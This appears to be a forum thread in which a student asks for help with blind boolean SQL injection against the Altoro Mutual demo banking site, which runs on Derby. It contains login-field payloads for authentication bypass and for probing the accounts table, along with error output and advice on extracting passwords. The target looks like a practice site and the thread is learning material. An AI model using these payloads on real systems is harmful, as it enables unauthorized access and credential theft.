Help on pen test assignment -- altoro mutual site

Hi.

I have to pen test altoro mutual site(https://demo.testfire.net) for a project. The site uses DERBY DB.

I have discovered that its login page is vulnerable to blind boolean sqli.

I have discovered that there is a table called accounts under schemaname of APP (ie. APP.accounts).

I typed in

Username: admin' and (select count(user) from app.accounts where user like '%a%')>0– Password: anything

This tests whether there is a user that contains a letter 'a'. If the test succeeds altoro mutual site logs in. Otherwise it says "Login Failed: We're sorry, but this username or password was not found in our system. Please try again."

I've tried the same test but this time iterated from a-zA-Z. But it never succeeds in logging in which tells me that maybe Username is not English alphabet. But this is unlikely.

So my problem is I don't know why LIKE operator doesn't return a result that is expected.

I also tried

Username: admin' and (select count(user) from app.accounts where user not like '%a%')>0– Password: anything

And this time every iteration of a-zA-Z logs in. So this result also tells me Username does not contain a letter.

Lastly this one works (it logs in)

Username: admin' and (select count(user) from app.accounts where user like '%')>0– Password: anything

Can you help me why LIKE operator fails when user LIKE '%a%' and so on?

THX

There are 5 usernames and they're all in English. Your problem has nothing to do with the LIKE operator not working. You are over complicating things that are actually pretty easy. And it is easy: https://www.hellboundhackers.org/challenges/basic16/index.php

Huitzilopochtli wrote: There are 5 usernames and they're all in English. Your problem has nothing to do with the LIKE operator not working. You are over complicating things that are actually pretty easy. And it is easy: https://www.hellboundhackers.org/challenges/basic16/index.php

I know I can log in as admin by

Username: admin'– Password: anything

Then you can get list of users in admin page.

BUT, the point is to get that information using SQL injection.

I tried

admin' and (select count(user) from app.accounts where user in ('admin', 'jdoe', 'jsmith', 'sspeed', 'tuser'))>0–

BUT gets

Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

I've also tried replacing space with /**/ but still no luck.

More info: The following gives this error:

Username: admin' order by 2–

Column position '2' is out of range for the query expression.

But

Username: admin' order by 1–

logs me in… which is strange because I would expect there will be at least two columns… user and passwd or something like that.

Yet more info: The following

admin' and (select count(*) from accounts)>=5–

logs in but

admin' and (select count(*) from accounts)=5–

doesn't.

So there are at least 5 records in accounts table. Actually the number is 10 which makes no sense.

admin' and (select count(*) from accounts)=10–

This logs in.

Yet more info: This is the weirdest thing

Username: admin' having '1'='1

gives error

Column PASSWORD is referenced in the HAVING clause but is not in the GROUP BY list.

But we've established that there is only 1 column and that is user. :O

Username: admin' and (select count(user) from accounts)>0–

This logs in.

Yet more stuff: This

admin' and (select count(password) from accounts)>0–

gives HTTP 500 error

also

This

admin' and (select count(password) from app.accounts where password like '%a%')>0–

gives HTTP 500 error

Right I'm confused here.

Is your assignment to construct a single sql statement that will log you into the site as admin, or is it to extract the usernames and passwords from the database ?

If it's to recover the passwords of each account,  you can see both the user and table names after you log in, so there is nothing here that is left to guesswork.

If php_errors are on you can use UNION and CONCAT to retrieve the password data

If errors are off, well it's no big deal as you already said you are aware of a blind injection point, so you can just extract the data one character at a time from there.

• ij> select count(*) from app.accounts where "user"='admin' and (select count("user") from app.accounts where "user" > 'a') > 0;1
• ij> select count(*) from app.accounts where "user"='' and (select count("user") from app.accounts where "user" > 'a') > 0;1
• ij> select count(*) from app.accounts where user='admin' and (select count(user) from app.accounts where user > 'a') > 0;1

Huitzilopochtli wrote: Right I'm confused here.

Is your assignment to construct a single sql statement that will log you into the site as admin, or is it to extract the usernames and passwords from the database ?

If it's to recover the passwords of each account,  you can see both the user and table names after you log in, so there is nothing here that is left to guesswork.

If php_errors are on you can use UNION and CONCAT to retrieve the password data

If errors are off, well it's no big deal as you already said you are aware of a blind injection point, so you can just extract the data one character at a time from there.

Hi. Thanks for your interest.

Yes, I'm trying to get usernames and passwords(or any other info) by using SQL injection.

The site is not PHP but JSP and database is Derby DB.

I"m not sure why queries above don't work.

For example the following site lists reserved words

https://db.apache.org/derby/docs/10.2/ref/rrefkeywords29722.html

Reserved identifiers need to be enclosed with "".

I think one of the columns in app.accounts is user. But user is a reserved word in Derby. Maybe that's why they don't work as expected?

So I try

admin' and (select count("user") from app.accounts where "user" >= 'a')>0–

gives error

Column 'user' is either not in any table in the FROM list or appears within a join specification and is outside the scope of the join specification or appears in a HAVING clause and is not in the GROUP BY list. If this is a CREATE or ALTER TABLE statement then 'user' is not a column in the target table.

Any ideas? I've tried with "USER", "User" and "user".

This

admin' and (select count(password) from app.accounts where password >= 'a') > 0 –

gives HTTP 500 error :O

PS. I figured out why there is one column name in SELECT clause. It is because the query is something like:

SELECT COUNT(*) FROM app.accounts WHERE user=$$$ AND password=$$$;

More info:

If payload is

admin' and (select count("user") from app.accounts where "user" > 'a') > 0–

SQL becomes

¶ij> select count(*) from app.accounts where "user"='admin' and (select count("user") from app.accounts where "user" > 'a') > 0; 1

1

There is only one user='admin'… This should log in.

If payload is:

' and (select count("user") from app.accounts where "user" > 'a') > 0–

then

¶ij> select count(*) from app.accounts where "user"='' and (select count("user") from app.accounts where "user" > 'a') > 0; 1

0

This shouldn't log in.

Also

¶ij> select count(*) from app.accounts where user='admin' and (select count(user) from app.accounts where user > 'a') > 0; 1

0

This shouldn't log in. user is not surrounded by "".